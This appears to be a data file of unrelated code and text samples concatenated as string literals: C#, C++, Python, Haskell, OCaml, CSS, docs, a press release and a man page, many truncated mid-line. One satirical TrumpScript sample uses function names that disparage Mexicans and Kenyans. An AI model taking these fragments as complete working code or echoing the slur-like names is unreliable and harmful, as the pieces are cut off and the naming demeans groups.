= 0;\n\n [JsonProperty(\"timeZoneId\", NullValueHandling = NullValueHandling.Ignore)]\n public const string TimeZoneId = \"GMT\";\n\n public InformaticaSchedule()\n {\n Type = \"schedule\";\n }\n\n public InformaticaSchedule(DateTime start, int frequency) : this()\n {\n this.Frequency = frequency;\n\n StartTime = start.ToUniversalTime();\n }\n }\n}" +"#ifndef BOXER_H\n#define BOXER_H\n\n#if defined(BOXER_DLL) && defined(BOXER_BUILD_DLL)\n /*!\n * BOXER_DLL must be defined by applications that are linking against the DLL version of the Boxer library.\n * BOXER_BUILD_DLL is defined when compiling the DLL version of the library.\n */\n #error \"You may not have both BOXER_DLL and BOXER_BUILD_DLL defined\"\n#endif\n\n/*!\n * BOXERAPI is used to declare public API classes / functions for export from the DLL / shared library / dynamic library\n */\n#if defined(_WIN32) && defined(BOXER_BUILD_DLL)\n // We are building Boxer as a Win32 DLL\n #define BOXERAPI __declspec(dllexport)\n#elif defined(_WIN32) && defined(BOXER_DLL)\n // We are calling Boxer as a Win32 DLL\n #define BOXERAPI __declspec(dllimport)\n#elif defined(__GNUC__) && defined(BOXER_BUILD_DLL)\n // We are building Boxer as a shared / dynamic library\n #define BOXERAPI __attribute__((visibility(\"default\")))\n#else\n // We are building or calling Boxer as a static library\n #define BOXERAPI\n#endif\n\nnamespace boxer {\n\n/*!\n * Options for styles to apply to a message box\n */\nenum class Style {\n Info,\n Warning,\n Error,\n Question\n};\n\n/*!\n * Options for buttons to provide on a message box\n */\nenum class Buttons {\n OK,\n OKCancel,\n YesNo,\n Quit\n};\n\n/*!\n * Possible responses from a message box. 'None' signifies that no option was chosen," +"+++\nTalk_date = \"\"\nTalk_start_time = \"\"\nTalk_end_time = \"\"\nTitle = \"Strong Consistency in Databases. What Does it Actually Guarantee?\"\nType = \"talk\"\nSpeakers = [\"andrew-gooding\"]\n+++\n\nDistributed data stores are subject to the CAP theorem, and historically NoSQL distributed systems have chosen availability over consistency. This has been changing, yet many famous databases are still AP only.\n\nIn Eric Brewer's 2012 follow-up article about the CAP theorem he stated:\n'Availability is obviously continuous from 0 to 100 percent, but there are also many levels of consistency, and even partitions have nuances, including disagreement within the system about whether a partition exists.'\n\nThis talk will include a theoretical overview, but focus on the practical aspects of the theorem.\n\n* What are the tradeoffs between AP and CP modes?\n\n* How do they affect your application and data?\n\n* How do different levels of consistency actually matter?" +"---\nlayout: pattern\ntitle: Feature Toggle\nfolder: feature-toggle\npermalink: /patterns/feature-toggle/\npumlid: NSZ14G8X30NGLhG0oDrk8XjPd12OvCTjNy_UthpxiAPvIBhUJc37WyZvgdtWp6U6U5i6CTIs9WtDYy5ER_vmEIH6jx8P4BUWoV43lOIHBWMhTnKIjB-gwRFkdFe5\ncategories: Behavioral\ntags:\n - Java\n - Difficulty-Beginner\n---\n\n## Also known as\nFeature Flag\n\n## Intent\nUsed to switch code execution paths based on properties or groupings. Allowing new features to be released, tested\nand rolled out. Allowing switching back to the older feature quickly if needed. It should be noted that this pattern,\ncan easily introduce code complexity. There is also cause for concern that the old feature that the toggle is eventually\ngoing to phase out is never removed, causing redundant code smells and increased maintainability.\n\n![alt text](./etc/feature-toggle.png \"Feature Toggle\")\n\n## Applicability\nUse the Feature Toogle pattern when\n\n* Giving different features to different users.\n* Rolling out a new feature incrementally.\n* Switching between development and production environments.\n\n## Credits\n\n* [Martin Fowler 29 October 2010 (2010-10-29).](http://martinfowler.com/bliki/FeatureToggle.html)" +"# 3 - Configuration\n\nConfiguration (credentials, database connection string, ...) should be stored in the environment.\n\n## What does that mean for our application ?\n\nIn _config/connections.js_, we define the _mongo_ connection and use MONGO_URL environment variable to pass the mongo connection string.\n\n```node\nmodule.exports.connections = {\n mongo: {\n adapter: 'sails-mongo',\n url: process.env.MONGO_URL\n }\n};\n```\n\nIn _config/model.js_, we make sure the _mongo_ connection defined above is the one used.\n\n```node\nmodule.exports.models = {\n connection: 'mongo',\n migrate: 'safe'\n};\n```\n\nThose changes enable to provide a different _MONGO_URL_ very easily as it's defined in the environment.\n\n[Previous](02_dependencies.md) - [Next ](04_external_services.md)" +"# Deaths per TWh from low-carbon energy (Sovacool et al., 2016)\n\nNumber of deaths attributed to energy-related accidents of low-carbon energy sources, measured as the number of deaths per terawatt-hour of production.\n\nSovacool et al. (2016) developed a database of energy-related accidents over the period from 1950 to 2014. They define an accident as: \"an unintentional incident or event at an energy facility that led to either one death (or more) or at least $50,000 in property damage.\"\n\nThis database was developed based on a series of academic databases (including ScienceDirect and EBSCO host) as well as the internet (using Google and Safari).\n\nThe normalized death rate data is presented by Sovacool et al. (2016) as the number of deaths per TWh over the period from 1990 to 2013." +"interpreter access\nisIntegerValue: intValue\n\t\"Answer if the given value can be represented as a Smalltalk integer value.\n\t In 64-bits we use a 3 bit tag which leaves 61 bits for 2's complement signed\n\t integers. In C, use a shift add and mask to test if the top 4 bits are all the same.\n\t Since 16rFFFFFFFFFFFFFFFF >> 60 = 16rF the computation intValue >> 60 + 1 bitAnd: 16rF\n\t maps in-range -ve values to 0 and in-range +ve values to 1.\"\n\t<api>\n\t^self\n\t\tcCode: [(intValue >> 60 + 1 bitAnd: 16rF) <= 1] \"N.B. (16rFFFFFFFFFFFFFFFF >> 60) + 1 = 16\"\n\t\tinSmalltalk: [intValue >= self minSmallInteger and: [intValue <= self maxSmallInteger]]" +"\nclass Foo(x: Int) {}\ncase class Bar(y: Int) extends Foo(y);\n\n\ntrait T {}\ntrait U {}\nclass C() {}\n\n\ntrait T1;\ntrait T2 {}\ntrait T5 extends T;\ntrait T6 extends T {}\ntrait T7 extends T with U;\ntrait T8 extends T with U {}\n\nclass C1();\nclass C2() {}\nclass C5() extends C();\nclass C6() extends C() {}\nclass C7() extends C() with U;\nclass C8() extends C() with U {}\n\ncase class D1();\ncase class D2() {}\ncase class D5() extends C();\ncase class D6() extends C() {}\ncase class D7() extends C() with U;\ncase class D8() extends C() with U {}\n\nobject M1;\nobject M2 {}\nobject M5 extends C();\nobject M6 extends C() {}\nobject M7 extends C() with U;\nobject M8 extends C() with U {}\n\n\n\n-----" +"import os\nimport sys\nimport copy\nimport logging\n\nfrom checker import *\nfrom .ofp import register_ofp_creators\nfrom .ofp import OfpBase\nfrom .ofp_group_desc_stats import SCE_GROUP_DESC_STATS\nfrom .ofp_group_desc_stats import OfpGroupDescStatsCreator\n\n# YAML:\n# group_desc_stats_reply:\n# flags: 0\n# body:\n# - group_desc_stats:\n# type: 0\n# group_id: 0\n# buckets:\n# - bucket:\n# weight: 0\n# watch_port: 0\n# watch_group: 0\n# actions\n# - output:\n# port: 0\n\nSCE_GROUP_DESC_STATS_REPLY = \"group_desc_stats_reply\"\nSCE_GROUP_DESC_STATS_BODY = \"body\"\n\n\n@register_ofp_creators(SCE_GROUP_DESC_STATS_REPLY)\nclass OfpGroupDescStatsReplyCreator(OfpBase):\n\n @classmethod\n def create(cls, test_case_obj, dp, ofproto, ofp_parser, params):\n # GroupDescStatsReply.\n kws = copy.deepcopy(params)\n\n body = []\n if SCE_GROUP_DESC_STATS_BODY in params:\n for desc_stats in params[SCE_GROUP_DESC_STATS_BODY]:\n desc_stats_obj = OfpGroupDescStatsCreator.create(\n test_case_obj, dp,\n ofproto, ofp_parser,\n desc_stats[SCE_GROUP_DESC_STATS])\n body.append(desc_stats_obj)\n kws[SCE_GROUP_DESC_STATS_BODY] = body\n\n # create GroupDescStatsReply.\n msg = ofp_parser.OFPGroupDescStatsReply(dp, **kws)\n msg.type = ofproto.OFPMP_GROUP_DESC\n\n msg._set_targets([\"version\", \"msg_type\",\n \"body\", \"flags\"])\n\n return msg" +"#\n# This file is part of LUNA.\n#\n# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>\n# SPDX-License-Identifier: BSD-3-Clause\n\n\"\"\" Interfaces for working with an ECP5 MSPI configuration flash. \"\"\"\n\nfrom nmigen import Signal, Module, Cat, Elaboratable, Instance\n\n\nclass ECP5ConfigurationFlashInterface(Elaboratable):\n \"\"\" Gateware that creates a connection to an MSPI configuration flash.\n\n Automatically uses appropriate platform resources; this abstracts away details\n necessary to e.g. drive the MCLK lines on an ECP5, which has special handling.\n\n I/O port:\n B: spi -- The platform \n\n I: sck -- The serial clock to be delivered to the SPI flash.\n I: sdi -- The SDI line to be passed through to the target flash.\n O: sdo -- The SDO line read from the target flash.\n I: cs -- Active-high chip select line.\n \"\"\"\n\n def __init__(self, *, bus, use_cs=False):\n \"\"\" Params:\n bus -- The SPI bus object to connect to.\n use_cs -- Whether or not the CS line should be passed through to the target device.\n \"\"\"\n\n self.bus = bus\n self.use_cs = use_cs\n\n #\n # I/O port\n #\n self.sck = Signal()\n self.sdi = Signal()\n self.sdo = Signal()\n self.cs = Signal()\n\n\n def elaborate(self, platform):\n m = Module()\n\n # Get the ECP5 block that's responsible for driving the" +"import functools\nimport time\nimport re\nfrom pathlib import Path\n\nfrom selenium.common.exceptions import ElementNotInteractableException\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.common.exceptions import NoSuchWindowException\nfrom selenium.webdriver.remote.command import Command\nfrom SeleniumLibrary.errors import ElementNotFound\nfrom robot.libraries.BuiltIn import BuiltIn\nimport robot.api as robot_api\n\n\ndef set_pdb_trace(pm=False):\n \"\"\"Start the Python debugger when robotframework is running.\n\n This makes sure that pdb can use stdin/stdout even though\n robotframework has redirected I/O.\n \"\"\"\n import sys\n import pdb\n\n for attr in (\"stdin\", \"stdout\", \"stderr\"):\n setattr(sys, attr, getattr(sys, \"__%s__\" % attr))\n if pm:\n # Post-mortem debugging of an exception\n pdb.post_mortem()\n else:\n pdb.set_trace()\n\n\n# This is a list of user actions that are likely to trigger\n# Aura actions and/or XHRs. We'll add a step to wait for\n# in-flight XHRs to complete after these commands.\nCOMMANDS_INVOKING_ACTIONS = {Command.CLICK_ELEMENT}\n\n\n# This script waits for a) Aura to be available and b)\n# any in-flight Aura XHRs to be complete.\n# We only do this if the page uses Aura, as determined by looking for\n# id=\"auraAppcacheProgress\" in the DOM.\n# It would be nice if we could inject the function when the page loads\n# and then just call it after commands, but I was having trouble\n# getting" +"\n\n(*let buffer_intervals (intervals : (int * int) list) buf ic oc =\n intervals\n |> List.iter\n (fun (start, stop) -> \n let len = stop - start in \n if len <> 0 then \n begin\n seek_in ic start ; \n Buffer.add_channel buf ic len ; \n Buffer.output_buffer oc buf ; \n Buffer.clear buf;\n end\n )*)\n \n\nlet preprocess fn oc = \n let ic = open_in_bin fn in \n let lexbuf = Lexing.from_channel ic in \n let buf = Buffer.create 4096 in \n Location.init lexbuf fn;\n Lexer.init ();\n lexbuf\n |> Lexer.filter_directive_from_lexbuf \n (* Get a list of segments\n TODO: output line directive\n *)\n |> List.iter\n (fun (start, stop) -> \n let len = stop - start in \n if len <> 0 then \n begin\n seek_in ic start ; \n Buffer.add_channel buf ic len ; \n Buffer.output_buffer oc buf ; \n Buffer.clear buf;\n end\n );\n close_in ic \n\n\nlet () = \n preprocess Sys.argv.(1) stdout" +"{-# LANGUAGE CPP\n , FlexibleContexts\n , FlexibleInstances\n , TypeFamilies\n , UndecidableInstances #-}\n{-# OPTIONS_GHC -fno-warn-orphans #-}\n\nmodule Test.Vision.Image (tests) where\n\n#if __GLASGOW_HASKELL__ < 710\nimport Control.Applicative ((<*>), (<$>))\n#endif\n\nimport Data.Vector.Storable (Storable, replicateM)\nimport Test.Framework (Test, testGroup)\nimport Test.Framework.Providers.QuickCheck2 (testProperty)\nimport Test.QuickCheck (Arbitrary (..), choose, Property)\nimport Test.Utils (propStorableRoundtrip)\n\nimport Vision.Image (\n MaskedImage (..), Image (..), Interpolable, FromFunction (..)\n , ImageChannel, Manifest (..), Delayed (..)\n , Grey, GreyPixel (..), HSVPixel (..)\n , RGBA, RGBAPixel (..), RGBADelayed\n , RGB, RGBPixel (..), InterpolMethod (..)\n , convert, resize, horizontalFlip, verticalFlip\n )\nimport Vision.Primitive (Z (..), (:.) (..), Size)\n\nmaxImageSize :: Int\nmaxImageSize = 100\n\ninstance (Arbitrary p, Storable p) => Arbitrary (Manifest p) where\n arbitrary = do\n w <- choose (1, maxImageSize)\n h <- choose (1, maxImageSize)\n vec <- replicateM (w * h) arbitrary\n return $ Manifest (Z :. h :. w) vec\n\ninstance Arbitrary GreyPixel where\n arbitrary = GreyPixel <$> arbitrary\n\ninstance Arbitrary RGBAPixel where\n arbitrary = RGBAPixel <$> arbitrary <*> arbitrary <*> arbitrary\n <*> arbitrary\n\ninstance Arbitrary RGBPixel where\n arbitrary = RGBPixel <$> arbitrary <*> arbitrary <*> arbitrary\n\ninstance Arbitrary HSVPixel where\n arbitrary = HSVPixel <$> arbitrary <*> arbitrary <*> arbitrary\n\ntests :: [Test]\ntests = [\n testGroup \"Conversions identities\" [" +".colorpicker {\n display: flex;\n}\n\n.color-picker-swatch {\n border: 1px solid #3960ff;\n border: 1px var(--colorpicker-border, #3960ff) dotted;\n}\n\n.transparent-swatch-arrow {\n padding-left: 3px;\n padding-top: 8px;\n}\n\n.colorpicker canvas {\n cursor: pointer;\n}\n\n.colorpicker-content .axis path,\n.colorpicker-content .axis line {\n fill: none;\n stroke: #456;\n stroke: var(--colorpicker-stroke, #456);\n shape-rendering: crispEdges;\n}\n\n.colorpicker-content .axis text {\n fill: #89a;\n fill: var(--colorpicker-fill, #89a);\n font: 10px $font-family-base;\n}\n\n.colorpicker-content .s .tick:last-of-type text,\n.colorpicker-content .l .tick:last-of-type text {\n display: none;\n}\n\n.colorpicker-content .channel canvas {\n width: 900px;\n height: 90px;\n float: left;\n margin: 0 30px;\n}\n\n.colorpicker-content-flex {\n margin: auto;\n .c-ckolor__picker {\n cursor: pointer;\n margin-bottom: 5px;\n width: 60px;\n height: 60px;\n border-radius: 30px;\n }\n}\n\n.c-ckolor__save-btn,\n.c-ckolor__close-btn {\n height: 65px;\n}" +"package com.aricneto.twistytimer.stats;\n\nimport android.util.Log;\n\nimport com.aricneto.twistytimer.items.AverageComponent;\nimport com.aricneto.twistytimer.utils.PuzzleUtils;\nimport com.aricneto.twistytimer.utils.StatUtils;\n\nimport java.util.ArrayList;\nimport java.util.Arrays;\nimport java.util.Collections;\nimport java.util.List;\n\n/**\n * Calculates the average time of a number of puzzle solves. Running averages are easily calculated\n * as each new solve is added. If the number of solve times is five or greater, the best and worst\n * times are discarded before returning the truncated arithmetic mean (aka \"trimmed mean\" or\n * \"modified mean) of the remaining times. All times and averages are in milliseconds. The mean,\n * minimum (best) and maximum (worst) of all added times, and the best average from all values of\n * the running average are also made available.\n *\n * @author damo\n */\npublic final class AverageCalculator {\n // NOTE: This implementation is reasonably efficient, as it can calculate an average without\n // iterating over the array of recorded times. Iteration is only required when the known best\n // or worst values are ejected to make room for new times. Storing times in sorted order would\n // reduce this explicit iteration, but a second data structure would be required to record the\n // insertion order and the insertion operations would be more costly, as the sort" +".\\\" Manpage for privacyidea-fix-access-rights.\n.\\\" Contact info@privacyidea.org for any feedback.\n.TH PRIVACYIDEA-FIX-ACCESS-RIGHTS 1 \"11 Oct 2015\" \"1.0\" \"privacyidea-fix-access-rights man page\"\n.SH NAME\nprivacyidea-fix-access-rights \\- fix the access rights of several files.\n.SH SYNOPSIS\nprivacyidea-fix-access-rights \\-f <cfg file> \\-u <privacyidea user>\n.SH DESCRIPTION\nThis tool fixes the access rights of the \n - encryption key\n - log directory\n - pi.cfg file\n\nIt reads the locations from the privacyidea.ini file.\n.SH COMMON OPTIONS\n.PP\n\\fB\\-f <cfg file> \\fR\n.RS 4\nThe pi.cfg file containing all necessary information.\n.RE\n\n.PP\n\\fB\\-u <privacyidea user> \\fR\n.RS 4\nThis is the user, privacyIDEA runs with. Usually \"privacyidea\".\n.RE\n\n\n.PP\n\\fB\\-h\\fR\n.RS 4\nDisplay a help message.\n.RE\n\n.SH INTERNET SOURCES\nhttp://www.privacyidea.org, http://www.linotp.org\n.SH SEE ALSO\n\n.SH BUGS\nNo known bugs.\n.SH AUTHOR\nLSE Leading Security Experts GmbH <linotp-community@lsexperts.de>, privacyIDEA <info@privacyidea.org>" +".type-info {\n border-left: 5px solid $color-green;\n margin-bottom: 0.5em;\n\n &.type-info-green {\n border-left-color: $color-green;\n }\n\n &.type-info-pink {\n border-left-color: $color-heart;\n }\n\n &.type-info-blue {\n border-left-color: $color-secondary;\n }\n\n &.type-info-orange {\n border-left-color: $color-warning;\n }\n\n &.type-info-purple {\n border-left-color: $color-purple;\n }\n\n &.type-info-red {\n border-left-color: $color-danger;\n }\n\n a {\n color: #fff;\n }\n\n ul.interface-map {\n list-style: none;\n margin-left: 0;\n padding-left: 0;\n\n &:empty {\n display: none;\n }\n\n li {\n margin: 0.5em 0;\n }\n }\n\n span.block {\n display: block;\n word-break: break-word;\n }\n\n code {\n background: #222;\n color: #fff;\n font-size: 14px;\n font-weight: bold;\n font-family: Consolas, Monaco, 'Andale Mono', 'Ubuntu Mono', monospace;\n padding:2px 8px;\n padding-top: 4px;\n display: inline-block;\n }\n}\n\n.type-title {\n cursor: pointer;\n background: #eee;\n padding: 1em;\n\n > b {\n color: transparentize($color: black, $amount: 0.2);\n font-size: 0.9em;\n }\n\n > h3 {\n margin: 0.3em 0;\n }\n\n > span.block {\n margin: 0.7em 0;\n }\n}\n\n.type-details {\n overflow: hidden;\n transition: opacity 500ms ease;\n\n &.open {\n padding: 0.5em;\n max-height: 100000;\n opacity: 1;\n }\n\n &.close {\n padding: 0;\n max-height: 0;\n opacity: 0;\n }\n}" +"import { Tree } from '@angular-devkit/schematics';\nimport * as fs from 'fs';\nimport { join } from 'path';\n\nexport function readContent(host: Tree, filePath: string): string {\n if (!host.exists(filePath)) return '';\n return host.read(filePath).toString('utf-8');\n}\n\n/**\n * Overwrite files to the project\n *\n * @param [overwrite=false] `true` is force, default: `false`\n */\nexport function overwriteFile(\n host: Tree,\n filePath: string,\n sourcePath?: string,\n overwrite: boolean = false,\n sourcePathIsString: boolean = false,\n): Tree {\n const isExists = host.exists(filePath);\n if (overwrite || isExists) {\n try {\n let content = '';\n if (sourcePathIsString) {\n content = sourcePath;\n } else {\n const buffer = fs.readFileSync(sourcePath);\n content = buffer ? buffer.toString('utf-8') : '';\n }\n if (overwrite) {\n if (isExists) {\n host.delete(filePath);\n }\n host.create(filePath, content);\n } else {\n host.overwrite(filePath, content);\n }\n } catch {}\n }\n return host;\n}\n\n/**\n * Overwrite files to the project\n *\n * @param [overwrite=false] `true` is force, default: `false`\n */\nexport function overwriteFiles(host: Tree, files: string[], _filePath: string, overwrite: boolean = false): Tree {\n files.forEach(p => overwriteFile(host, p, join(_filePath, p), overwrite));\n return host;\n}\n\n/**\n * Add files to the project\n *\n * @param [overwrite=false] `true` is force, default: `false`\n */\nexport function addFiles(host: Tree, files: string[], _filePath: string, overwrite: boolean = false): Tree" +"---\nlayout: post\ntitle: \"This Week in React: Oct 20\"\nexcerpt_separator: <!--more-->\nauthor: Zach Silveira\ndate: 2014-10-20 18:22\npublished: true\ncategories: react\ntags: twir\n---\nThis is the first weekly roundup on ReactJS News! We've been busy working on making this site awesome for you guys, and it's coming along. Let's get started.\n\n<!--more-->\n\nThis is the first weekly roundup on ReactJS News! We've been busy working on making this site awesome for you guys, and it's coming along. Let's get started.\n\n##React DnD\nFirst off, we've got a [React Drag n' drop library](https://github.com/gaearon/react-dnd). I've had to make something like this at work, but this would have been so much easier to use. Creating a drop target with this mixin is very easy, as we can see from its documentation:\n\n~~~js\nvar { DragDropMixin } = require('react-dnd'),\n ItemTypes = require('./ItemTypes');\n\nvar ImageBlock = React.createClass({\n mixins: [DragDropMixin],\n\n configureDragDrop(registerType) {\n\n registerType(ItemTypes.IMAGE, {\n\n // dropTarget, when specified, is { acceptDrop(item)?, canDrop(item)? enter(item)?, over(item)?, leave(item)? }\n dropTarget: {\n acceptDrop(image) {\n // Do something with image! for example,\n DocumentActionCreators.setImage(this.props.blockId, image);\n }\n }\n });\n },\n\n render() {\n\n // {...this.dropTargetFor(ItemTypes.IMAGE)} will expand into\n // { onDragEnter: (handled by mixin), onDragOver: (handled by mixin), onDragLeave: (handled by mixin)," +"---\nlayout: relation\ntitle: 'dislocated:vo'\nshortdef: 'dislocated object of verb-object compound'\nudver: '2'\n---\n\nThe `dislocated:vo` relation is used when the object of a verb-object compound (see [compound:vo]()) is fronted to topic position.\n\n~~~ conllu\n# visual-style 5 3 dislocated:vo\tcolor:blue\n# visual-style 5\tbgColor:blue\n# visual-style 5\tfgColor:white\n# visual-style 3\tbgColor:blue\n# visual-style 3\tfgColor:white\n1\t\u4f60\t_\tPRON\t_\t_\t3\tnmod\t_\t2SG\n2\t\u7684\t_\tPART\t_\t_\t1\tcase\t_\tGEN\n3\t\u96fb\u8a71\t_\tNOUN\t_\t_\t5\tdislocated:vo\t_\tphone\n4\t\u600e\u9ebc\t_\tADV\t_\t_\t5\tadvmod\t_\thow\n5\t\u6253\t_\tVERB\t_\t_\t7\tadvcl\t_\thit\n6\t\u90fd\t_\tADV\t_\t_\t7\tadvmod\t_\tstill\n7\t\u6c92\t_\tVERB\t_\t_\t0\troot\t_\tnot-exist\n8\t\u4eba\t_\tNOUN\t_\t_\t7\tobj\t_\tpeople\n9\t\u63a5\t_\tVERB\t_\t_\t8\tacl\t_\treceive\n\n1\t\"Your\t_\t_\t_\t_\t0\t_\t_\t_\n2\tphone,\t_\t_\t_\t_\t0\t_\t_\t_\n3\tno\t_\t_\t_\t_\t0\t_\t_\t_\n4\tmatter\t_\t_\t_\t_\t0\t_\t_\t_\n5\thow\t_\t_\t_\t_\t0\t_\t_\t_\n6\tone\t_" +"DATELINE DECEMBER 10, 2001\n\nFOR IMMEDIATE RELEASE\n\nBOCHS PROJECT RELEASES USABILITY ENHANCED EMULATOR\n\"Release adds easy to use configuration and networking support\"\n\nDecember 10, 2001 (The INTERNET) - The Bochs IA-32 Emulator Project unveiled a new\nversion of the popular Bochs emulator to the public today, improving on the\nstability and ground breaking improvements of Bochs 1.2.\n Bochs 1.3 includes many major enhancements including a powerful menu-based\nconfiguration system and networking support for Linux and Windows NT/2000. Other\nadditions in this release include support for ISO-format disk images, improved\nmouse performance, physical CD-ROM support for all versions of Windows, parallel\nport emulation, enhanced debugger, and many cpu and device model improvements. Bochs\n1.3 also adds native support for Mac OS X and Amiga MorphOS, along with improved\nsupport for BeOS. You can find Bochs binaries for Windows and Linux (along with the\nsource code for UNIX, Linux, Windows, and Mac OS) at http://bochs.sourceforge.net .\n\nABOUT BOCHS\n\n Bochs is the most popular open source x86 emulator available today. Bochs\ncompiles on a number of platforms including UNIX(R) and UNIX-like systems, Windows,\nand MacOS.\n Bochs can be used for many purposes such as running Windows on other\nplatforms, trying a new operating" +"--[[\n * ReaScript Name: Delete selected items active take envelopes\n * Author: IXix\n * Link:\n Forum http://forum.cockos.com/showthread.php?t=179032\n * Licence: GPL v3\n * REAPER: 5.0\n * Extensions: None\n * Version: 1.0\n--]]\n \n--[[\n * Changelog:\n * v1.0 (2016-10-29)\n\t+ Initial Release\n--]]\n\n-- Uploaded by X-Raym\n\nreaper.PreventUIRefresh(1)\n\nreaper.Undo_BeginBlock()\n\nselItemCount = reaper.CountSelectedMediaItems(pProj)\ni = 0\nwhile i < selItemCount do\n pItem = reaper.GetSelectedMediaItem(pProj, i)\n pTake = reaper.GetMediaItemTake(pItem, 0)\n \n itemchunk = \"\";\n envchunk = \"\"\n result, itemchunk = reaper.GetItemStateChunk(pItem, itemchunk, 1)\n \n envCount = reaper.CountTakeEnvelopes(pTake)\n e = 0\n while e < envCount do\n pEnv = reaper.GetTakeEnvelope(pTake, e) \n\n result, envchunk = reaper.GetEnvelopeStateChunk(pEnv, envchunk, 1)\n \n x, y = string.find(itemchunk, envchunk, 0, 0)\n \n if x and y then\n itemchunk = string.sub(itemchunk, 0, x - 1) .. string.sub(itemchunk, y , 0)\n end\n \n --reaper.ShowConsoleMsg(itemchunk)\n \n e = e + 1\n end\n \n reaper.SetItemStateChunk(pItem, itemchunk, 1);\n \n reaper.UpdateItemInProject(pItem)\n \n i = i + 1\nend\n\nreaper.Undo_EndBlock(\"Delete selected items active take envelopes\", -1)\n\nreaper.UpdateArrange()\nreaper.UpdateTimeline()\n\nreaper.PreventUIRefresh(-1)" +"# Streaming at Scale integration tests\n\n## Integration test suite\n\nThe suite is designed to run in a fully automated manner in Azure DevOps. It\ndeploys each scenario from the streaming-at-scale project in a new resource\ngroup, then runs a verification job in Azure Databricks that reads the entire\nset of events generated by the scenario, and tests assertions on the throughput\nand latency. For instance, after running the eventhubs-functions-cosmosdb\nscenario at 5000 events/second, the verification job downloads the output data\nstored in CosmosDB and computes the end-to-end latency and throughput\naggregated at one-minute interval. To account for some runtime variability, the\ntest asserts that a throughput of at least 90% of the expected throughput (in\nthat case, 270,000 events in a one-minute interval) was reached at least once.\n\nSince the provisioning of an Azure Databricks workspace cannot be fully\nautomated at present, you must generate a PAT token of a preexisting workspace\nand supply it to the pipeline.\n\n## Installing the build agent\n\nAs the integration tests can run for more than 6 hours, they must be run on self-hosted Azure DevOps agents.\n\nCreate a project in Azure DevOps. Create an agent pool named \"streaming-at-scale\".\n\nIn the Azure portal," +"(ns enliven.core.actions\n (:refer-clojure :exclude [replace]))\n\n;; An action is made of an op, a scope-idx, an arg and\n\n(defn replace [path] {:op ::replace :scope-idx 0 :arg path})\n(defn dup [path sub] {:op ::dup :scope-idx 0 :arg path :subs [[list sub]]})\n\n(defmulti update (fn [action key f & args] key))\n\n(defmethod update :default [action key f & args]\n (assoc action key (mapv #(apply f % args) (get action key))))\n\n#_(defmethod update :subs [action key f & args]\n (assoc action :subs (mapv (fn [[p sub]] [p (apply f sub args)]) (:subs action))))\n\n(defmethod update :arg [action key f & args]\n (if-let [path (:arg action)]\n (assoc action :arg (apply f path args))\n action))" +"name: test\nchannels:\n - conda-forge\ndependencies:\n - python=3.7\n - six\n - pyyaml\n - deprecated\n # testing\n - matplotlib\n - pytest\n - pytest-cov\n - coverage\n - codecov\n # optional\n - geopandas\n - bokeh\n - scikit-learn\n - numba\n - statsmodels\n - scikit-learn\n - geopandas\n - quantecon\n - rtree\n - tqdm\n - quilt3\n - rasterio\n - rasterstats\n - pytest\n - coverage\n - coveralls\n - ipywidgets\n - twine\n - urbanaccess\n - urllib3<1.25\n - wheel\n - dill\n - pytest\n - pytest-cov\n - codecov\n - bokeh\n - libpysal\n - esda\n - spaghetti\n - tobler>=0.2.1\n - spint\n - spreg\n - spvcm\n - mgwr\n - segregation\n - pointpats\n - giddy\n - mapclassify\n - seaborn\n - descartes\n - numba\n - inequality\n - access\n - splot" +"#!/usr/bin/env node\n\nconst argparse = require('argparse');\nconst version = require('./src/version').version;\nconst view = require(\"./cli/view\");\nconst build = require(\"./cli/build\");\nconst develop = require(\"./cli/develop\");\nconst convert = require(\"./cli/convert\");\n\nconst parser = new argparse.ArgumentParser({\n version: version,\n addHelp: true,\n description: `Auspice version ${version}.`,\n epilog: `\n Auspice is an interactive visualisation tool for phylogenomic data.\n It can be used to display local datasets (see \"auspice view -h\" for details),\n or to build a customised version of the software (see \"auspice build -h\" for details).\n This is the software which powers the visualisations on nextstrain.org and auspice.us, amoung others.\n `\n});\n\nconst subparsers = parser.addSubparsers({title: 'Auspice commands', dest: \"subcommand\"});\nview.addParser(subparsers);\nbuild.addParser(subparsers);\ndevelop.addParser(subparsers);\nconvert.addParser(subparsers);\n\nconst args = parser.parseArgs();\n\nif (args.verbose) global.AUSPICE_VERBOSE = true;\n\nif (args.subcommand === \"build\") {\n build.run(args);\n} else if (args.subcommand === \"view\") {\n view.run(args);\n} else if (args.subcommand === \"develop\") {\n develop.run(args);\n} else if (args.subcommand === \"convert\") {\n convert.run(args);\n}\n\n// console.dir(args);" +"Namespaces\n========================\n\nWhen generating with a target language of \"scala\" (the default), scrooge will\nfirst look for and use a \"scala\" namespace declaration. If no scala namespace\nis specified, scrooge will then fall back to any \"java\" namespace declaration,\nand lastly to the catch-all \"*\" namespace.\n\nApache's thrift generator, prior to version 0.9, will actually abort with a\nparse error if it encounters a \"scala\" namespace declaration (or for any\nlanguage but a few known languages that it supports). This means that adding a\n\"scala\" namespace declaration to your thrift file, while optimal for scrooge\nusers, will render your thrift file unparseable by many versions of apache's\nthrift generator.\n\nTo allow for backwards-compatibility with Apache's thrift generator, scrooge\nsupports a special comment-based namespace declaration that Apache's thrift\ngenerator will ignore. To use this syntax, use the line comment character '#',\nimmediately followed by '@'. Apache's thrift generator will treat the\nremaining text as a line comment, but scrooge will interprent any following\nnamespace declaration as if not commented-out. For example:\n\n::\n\n namespace java com.twitter.tweetservice.thriftjava\n #@namespace scala com.twitter.tweetservice.thriftscala" +"import locale\nimport os\nimport platform\nimport random\nimport sys\n\n# yes, bringing in openssl is completely necessary for proper operation of trumpscript\nimport ssl\n\nfrom trumpscript.constants import ERROR_CODES\n\nclass Utils:\n class SystemException(Exception):\n def __init__(self, msg_code) -> Exception:\n \"\"\"\n Get the error from the error code and throw Exception\n :param msg_code: the code for the error\n :return: The new Exception\n \"\"\"\n if msg_code in ERROR_CODES:\n raise Exception(random.choice(ERROR_CODES[msg_code]))\n else:\n raise Exception(random.choice(ERROR_CODES['default']))\n\n @staticmethod\n def verify_system(wall) -> None:\n \"\"\"\n Verifies that this system is Trump-approved, throwing\n a SystemException otherwise\n :return:\n \"\"\"\n Utils.no_wimps()\n Utils.no_pc()\n Utils.boycott_apple()\n Utils.no_commies_mexicans_or_kenyans(wall)\n Utils.no_commie_network()\n\n @staticmethod\n def warn(str, *args) -> None:\n \"\"\"\n Prints a warning to stderr with the specified format args\n :return:\n \"\"\"\n print('WARNING: ' + (str % args), file=sys.stderr)\n\n @staticmethod\n def no_wimps() 